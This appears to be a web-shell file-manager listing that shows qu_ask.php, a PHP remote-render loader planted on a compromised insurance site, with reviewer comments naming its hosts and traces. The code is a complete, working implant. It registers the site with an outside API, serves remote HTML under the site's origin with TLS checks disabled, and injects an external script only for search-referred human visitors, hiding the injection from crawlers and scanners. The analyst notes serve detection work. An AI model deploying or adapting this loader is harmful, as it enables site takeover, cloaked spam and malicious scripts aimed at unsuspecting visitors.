MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //proc/self/cwd/qu_ask.php
<?php

// Deployment settings for this remote-render loader.
// NOTE(review): the two hostnames and the site key below are the sample-specific
// values to search for in web roots, outbound proxy logs and DNS logs.

// Site identifier sent as site_key on every API call (heartbeat, register-site, render).
define('SITE_KEY', 'trebiaseguros_com');
// Remote endpoint whose /render response is echoed to visitors as this site's HTML.
define('API_BASE', 'https://grh7.pro/api');
// External script URL inserted into the page only for non-crawler visitors whose
// Referer is a search engine (see the condition near the end of the file).
define('USER_JS', 'https://files.grh7.pro/news.js');
// When true, the 502 error page also prints error_get_last() details.
define('DEBUG', false);
// false switches off TLS certificate and host-name verification in remote_http_get(),
// for both the cURL path and the stream-wrapper fallback.
define('SSL_VERIFY', false);

/**
 * Report whether a php.ini directive currently holds an "enabled" value.
 *
 * The value from ini_get() is cast to string, trimmed and lower-cased, then
 * compared strictly against '1', 'on', 'true' and 'yes'. An unknown directive
 * (ini_get() returns false, which casts to '') yields false.
 *
 * @param string $name Directive name, e.g. 'allow_url_fopen'.
 * @return bool
 */
function remote_ini_truthy($name)
{
    $value = strtolower(trim((string) ini_get($name)));

    foreach (array('1', 'on', 'true', 'yes') as $enabled) {
        if ($value === $enabled) {
            return true;
        }
    }

    return false;
}

/**
 * Decide whether the current request should be treated as HTTPS.
 *
 * Checked in order: $_SERVER['HTTPS'] (non-empty and not 'off'), SERVER_PORT
 * equal to '443', then the proxy headers X-Forwarded-Proto ('https'),
 * X-Forwarded-SSL ('1') and Front-End-Https ('on').
 *
 * NOTE(review): the three HTTP_* values are request headers; unless a front-end
 * proxy overwrites them, the client controls them, so the result only decides
 * the scheme string built by the caller and is not proof of a TLS connection.
 *
 * @return bool
 */
function remote_is_https()
{
    return (!empty($_SERVER['HTTPS']) && strtolower((string) $_SERVER['HTTPS']) !== 'off')
        || (isset($_SERVER['SERVER_PORT']) && (string) $_SERVER['SERVER_PORT'] === '443')
        || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])
            && strtolower((string) $_SERVER['HTTP_X_FORWARDED_PROTO']) === 'https')
        || (!empty($_SERVER['HTTP_X_FORWARDED_SSL'])
            && (string) $_SERVER['HTTP_X_FORWARDED_SSL'] === '1')
        || (!empty($_SERVER['HTTP_FRONT_END_HTTPS'])
            && strtolower((string) $_SERVER['HTTP_FRONT_END_HTTPS']) === 'on');
}

/**
 * Fetch a URL with GET and return the response body, or false on failure.
 *
 * Uses cURL when the extension is loaded; otherwise falls back to
 * file_get_contents() if allow_url_fopen is enabled. A response is accepted
 * only when its status code is in the 200-399 range.
 *
 * NOTE(review): every caller in this file passes the visitor's own User-Agent
 * and Referer here, so those request headers are relayed to the remote API.
 *
 * @param string $url     Absolute URL to request.
 * @param string $ua      User-Agent to send; a fixed default is used when empty.
 * @param string $referer Referer header value to send.
 * @param int    $timeout Total timeout in seconds (connect timeout is capped at 15).
 * @return string|false   Response body, or false on transport error / rejected status.
 */
function remote_http_get($url, $ua, $referer, $timeout = 30)
{
    $ua = $ua !== '' ? $ua : 'Mozilla/5.0 (compatible; RemoteRender/1.0)';
    // Verification defaults to on, but this file defines SSL_VERIFY as false.
    $verify = defined('SSL_VERIFY') ? (bool) SSL_VERIFY : true;
    $timeout = (int) $timeout;

    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        if ($ch === false) {
            return false;
        }
        $opts = array(
            CURLOPT_RETURNTRANSFER => true,
            // Redirects are followed (up to 5), so the final body may come from a
            // different host than the one in $url.
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_MAXREDIRS => 5,
            CURLOPT_CONNECTTIMEOUT => min(15, $timeout),
            CURLOPT_TIMEOUT => $timeout,
            CURLOPT_HTTPHEADER => array(
                'User-Agent: ' . $ua,
                'Referer: ' . $referer,
                'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            ),
            // With $verify false the peer certificate and host name are not checked.
            CURLOPT_SSL_VERIFYPEER => $verify,
            CURLOPT_SSL_VERIFYHOST => $verify ? 2 : 0,
        );
        if (defined('CURLOPT_PROTOCOLS')) {
            // Limit the transfer to http:// and https:// URLs.
            $opts[CURLOPT_PROTOCOLS] = CURLPROTO_HTTP | CURLPROTO_HTTPS;
        }
        if (defined('CURLOPT_ENCODING')) {
            // Empty string: advertise every content encoding cURL supports and decode it.
            $opts[CURLOPT_ENCODING] = '';
        }
        curl_setopt_array($ch, $opts);
        $body = curl_exec($ch);
        $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        if ($body === false || $code < 200 || $code >= 400) {
            return false;
        }

        return $body;
    }

    // Fallback path: only usable when allow_url_fopen is enabled.
    if (!remote_ini_truthy('allow_url_fopen')) {
        return false;
    }

    $ctx = stream_context_create(array(
        'http' => array(
            'timeout' => $timeout,
            // $ua and $referer are interpolated into the raw header block as-is.
            'header' => "User-Agent: $ua\r\nReferer: $referer\r\nAccept: */*\r\n",
            // Return the body even for error statuses; the status is checked below.
            'ignore_errors' => true,
        ),
        'ssl' => array(
            'verify_peer' => $verify,
            'verify_peer_name' => $verify,
        ),
    ));

    // '@' hides the warning PHP would emit on a failed request.
    $body = @file_get_contents($url, false, $ctx);
    if ($body === false) {
        return false;
    }

    // $http_response_header is populated by the HTTP wrapper in the local scope;
    // only its first status line is inspected here.
    if (isset($http_response_header[0]) && preg_match('#\s(\d{3})\s#', $http_response_header[0], $m)) {
        $sc = (int) $m[1];
        if ($sc < 200 || $sc >= 400) {
            return false;
        }
    }

    return $body;
}

/**
 * Classify a User-Agent string as an automated client.
 *
 * Returns true for an empty User-Agent, or when the lower-cased value contains
 * any entry of the substring list below (search-engine crawlers, SEO crawlers,
 * link-preview fetchers and common HTTP tools such as curl/ and python-requests).
 *
 * NOTE(review): the caller withholds the injected script from anything this
 * function flags, so a scan that uses a crawler or tool User-Agent will not
 * observe the script insertion.
 *
 * @param string $ua Raw User-Agent header value.
 * @return bool
 */
function remote_is_spider($ua)
{
    $ua = trim($ua);
    if ($ua === '') {
        return true;
    }
    // Substring list is built once per request and kept in a static variable.
    static $p = null;
    if ($p === null) {
        $p = array('googlebot', 'google-inspectiontool', 'adsbot-google', 'mediapartners-google', 'bingbot', 'msnbot', 'slurp', 'duckduckbot', 'baiduspider', 'yandexbot', 'sogou', 'exabot', 'facebot', 'facebookexternalhit', 'twitterbot', 'linkedinbot', 'pinterest', 'applebot', 'ia_archiver', 'petalbot', 'bytespider', 'semrushbot', 'ahrefsbot', 'mj12bot', 'dotbot', 'rogerbot', 'megaindex', 'blexbot', 'crawler', 'spider', 'bot.htm', 'bot.php', 'crawl', 'scrapy', 'python-requests', 'curl/', 'wget/', 'httpclient', 'slackbot', 'discordbot', 'telegrambot', 'whatsapp');
    }
    // Case-insensitive "contains" match against each entry.
    $l = strtolower($ua);
    foreach ($p as $x) {
        if ($x !== '' && strpos($l, $x) !== false) {
            return true;
        }
    }

    return false;
}

/**
 * Byte-wise, case-sensitive suffix test.
 *
 * An empty needle always matches; a needle longer than the haystack never does.
 *
 * @param string $haystack String to inspect.
 * @param string $needle   Suffix to look for.
 * @return bool
 */
function remote_str_ends_with($haystack, $needle)
{
    if ($needle === '') {
        return true;
    }

    $suffixLength = strlen($needle);
    if (strlen($haystack) < $suffixLength) {
        return false;
    }

    return substr($haystack, -$suffixLength) === $needle;
}

/**
 * Decide whether a Referer header points at a search engine.
 *
 * The host part of the Referer is lower-cased, a leading "www." is dropped,
 * and the result is matched against a series of per-engine rules. Values that
 * are empty, longer than 2048 bytes, or without a parsable host return false.
 *
 * NOTE(review): several rules are substring tests on the host rather than
 * suffix tests ('.bing.com', '.msn.com', 'duckduckgo.', 'yandex.', 'naver.',
 * '.so.com', 'search.yahoo'), and the Referer is client-supplied, so this is a
 * heuristic and not a verified traffic source.
 *
 * @param string $referer Raw Referer header value.
 * @return bool
 */
function remote_referer_is_search_engine($referer)
{
    $referer = trim((string) $referer);
    if ($referer === '' || strlen($referer) > 2048) {
        return false;
    }
    $parsed = parse_url($referer);
    if (!is_array($parsed) || empty($parsed['host'])) {
        return false;
    }
    $host = strtolower((string) $parsed['host']);
    if (strpos($host, 'www.') === 0) {
        $host = substr($host, 4);
    }
    // Google-owned hosts that are explicitly not counted as search referrals;
    // checked before the generic google. rule below.
    if (strpos($host, 'googleusercontent') !== false
        || strpos($host, 'googleadservices') !== false
        || strpos($host, 'googletagmanager') !== false) {
        return false;
    }
    // "google." at the start of the host or after a dot (any TLD follows).
    if (preg_match('/(^|\.)google\./', $host)) {
        return true;
    }
    if (remote_str_ends_with($host, 'bing.com') || strpos($host, '.bing.com') !== false) {
        return true;
    }
    if (remote_str_ends_with($host, 'msn.com') || strpos($host, '.msn.com') !== false) {
        return true;
    }
    if (remote_str_ends_with($host, 'baidu.com')) {
        return true;
    }
    if (strpos($host, 'search.yahoo') !== false || $host === 'yahoo.com' || $host === 'yahoo.co.jp') {
        return true;
    }
    if (strpos($host, 'duckduckgo.') !== false) {
        return true;
    }
    if (strpos($host, 'yandex.') !== false) {
        return true;
    }
    if (remote_str_ends_with($host, 'sogou.com')) {
        return true;
    }
    if ($host === 'so.com' || strpos($host, '.so.com') !== false || strpos($host, 'so.360.cn') !== false) {
        return true;
    }
    if (strpos($host, 'naver.') !== false) {
        return true;
    }
    // Remaining engines: exact host or any subdomain of the listed names.
    $otherSearch = array(
        'ecosia.org',
        'qwant.com',
        'startpage.com',
        'search.brave.com',
        'brave.com',
        'petalsearch.com',
        'seznam.cz',
        'swisscows.com',
        'you.com',
    );
    foreach ($otherSearch as $suffix) {
        if ($host === $suffix || remote_str_ends_with($host, '.'.$suffix)) {
            return true;
        }
    }

    return false;
}

/**
 * Insert a deferred external <script> tag into an HTML document.
 *
 * The tag is placed immediately before the last "</body>"; if there is none,
 * before the last "</html>"; if neither exists it is appended after a newline.
 * An empty $src leaves the document unchanged.
 *
 * NOTE(review): on an affected site the visible artefact is a
 * `<script src="..." defer>` element directly in front of the closing body tag
 * that is absent from the site's own templates.
 *
 * @param string $html Document to modify.
 * @param string $src  Script URL; HTML-escaped before being placed in the attribute.
 * @return string      The document with the tag inserted (or unchanged).
 */
function remote_inject_script($html, $src)
{
    if ($src === '') {
        return $html;
    }
    $tag = '<script src="' . htmlspecialchars($src, ENT_QUOTES, 'UTF-8') . '" defer></script>';
    // Offsets are found in a lower-cased copy and then applied to the original
    // string; strripos() is itself case-insensitive, so the copy is redundant.
    $h = strtolower($html);
    foreach (array('</body>', '</html>') as $end) {
        $pos = strripos($h, $end);
        if ($pos !== false) {
            return substr($html, 0, $pos) . $tag . "\n" . substr($html, $pos);
        }
    }

    return $html . "\n" . $tag;
}

// Request handler. Summary of what the code below does:
//   ?ping      -> relays the remote /heartbeat response as JSON
//   ?register  -> reports this host and script URL to the remote /register-site
//   otherwise  -> fetches HTML from the remote /render endpoint and echoes it
// None of the three branches checks any credential before running.
// NOTE(review): in access logs this shows up as requests to this script with
// the query parameters ping, register, path or page; on the egress side as
// HTTPS requests from the web server to the API_BASE host.

// Configuration guard. The message names remote.php, while the listing header
// shows this copy as qu_ask.php (presumably renamed after deployment; not
// confirmable from this page).
if (SITE_KEY === '') {
    http_response_code(503);
    header('Content-Type: text/html; charset=UTF-8');
    echo '<!DOCTYPE html><html><body><p>Please set SITE_KEY in remote.php</p></body></html>';
    exit;
}

// Requested path comes from the query string and is reduced to its URL path component.
$path = isset($_GET['path']) ? trim((string) $_GET['path']) : '/';
$parsedPath = parse_url($path, PHP_URL_PATH);
$path = $path === '' ? '/' : ($parsedPath ? $parsedPath : $path);
// Host, User-Agent and Referer are taken from the incoming request unmodified.
$host = isset($_SERVER['HTTP_HOST']) ? (string) $_SERVER['HTTP_HOST'] : '';
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? (string) $_SERVER['HTTP_USER_AGENT'] : '';
$referer = isset($_SERVER['HTTP_REFERER']) ? (string) $_SERVER['HTTP_REFERER'] : '';
$scriptPath = isset($_SERVER['SCRIPT_NAME']) ? (string) $_SERVER['SCRIPT_NAME'] : '';
if ($scriptPath === '') {
    $scriptPath = isset($_SERVER['PHP_SELF']) ? (string) $_SERVER['PHP_SELF'] : '/';
}
// Public URL of this script, built from the request's Host header and script path.
$scheme = remote_is_https() ? 'https' : 'http';
$entryUrl = $scheme . '://' . $host . $scriptPath;

// Heartbeat: sends site_key and host to the remote API and returns its answer verbatim.
if (isset($_GET['ping'])) {
    $url = API_BASE . '/heartbeat?site_key=' . rawurlencode(SITE_KEY) . '&host=' . rawurlencode($host);
    $json = remote_http_get($url, $ua, $referer, 10);
    header('Content-Type: application/json; charset=UTF-8');
    echo $json !== false ? $json : '{"status":"error","message":"request failed"}';
    exit;
}

// Registration: tells the remote API this domain and the URL where the script is reachable.
if (isset($_GET['register'])) {
    $reg = API_BASE . '/register-site?site_key=' . rawurlencode(SITE_KEY)
        . '&domain=' . rawurlencode($host) . '&entry_url=' . rawurlencode($entryUrl) . '&script_type=php';
    $regBody = remote_http_get($reg, $ua, $referer, 15);
    header('Content-Type: application/json; charset=UTF-8');
    echo $regBody !== false ? $regBody : '{"status":"error","message":"request failed"}';
    exit;
}

// Render: the visitor's path, host, User-Agent and Referer are sent to the remote
// API, which can therefore choose a different response per visitor.
$url = API_BASE . '/render?site_key=' . rawurlencode(SITE_KEY)
    . '&path=' . rawurlencode($path) . '&host=' . rawurlencode($host)
    . '&ua=' . rawurlencode($ua) . '&referer=' . rawurlencode($referer);
if (isset($_GET['page']) && (string) $_GET['page'] !== '') {
    // page is forced to an integer before being appended.
    $url .= '&page=' . (int) $_GET['page'];
}

$html = remote_http_get($url, $ua, $referer, 30);
if ($html === false) {
    // Remote fetch failed: answer 502 with a generic message (details only when DEBUG is on).
    http_response_code(502);
    header('Content-Type: text/html; charset=UTF-8');
    $msg = 'Service temporarily unavailable.';
    if (defined('DEBUG') && DEBUG) {
        $le = error_get_last();
        if ($le && !empty($le['message'])) {
            $msg .= ' ' . $le['message'];
        }
        if (!function_exists('curl_init') && !remote_ini_truthy('allow_url_fopen')) {
            $msg .= ' Enable PHP curl extension or allow_url_fopen.';
        }
    }
    echo '<!DOCTYPE html><html><body><p>' . htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') . '</p></body></html>';
    exit;
}

// The USER_JS script is added only when the User-Agent is not flagged as a
// crawler AND the Referer is a search engine; every other visitor gets the
// remote HTML without it.
if (!remote_is_spider($ua) && remote_referer_is_search_engine($referer)) {
    $html = remote_inject_script($html, trim(USER_JS));
}

// The remotely supplied markup is emitted unfiltered under this site's origin.
header('Content-Type: text/html; charset=UTF-8');
echo $html;